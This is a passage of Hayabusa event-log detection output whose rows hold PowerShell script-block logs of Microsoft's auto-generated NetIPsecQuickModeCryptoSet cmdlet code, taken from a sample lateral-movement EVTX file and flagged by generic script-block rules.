$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecQuickModeCryptoSet' -Alias '*' function Remove-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')]",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.660 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"tains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeCryptoSet' -Alias '*' function Set-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecQuickModeCryptoSet' -Alias '*' function Remove-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')]",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.660 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if 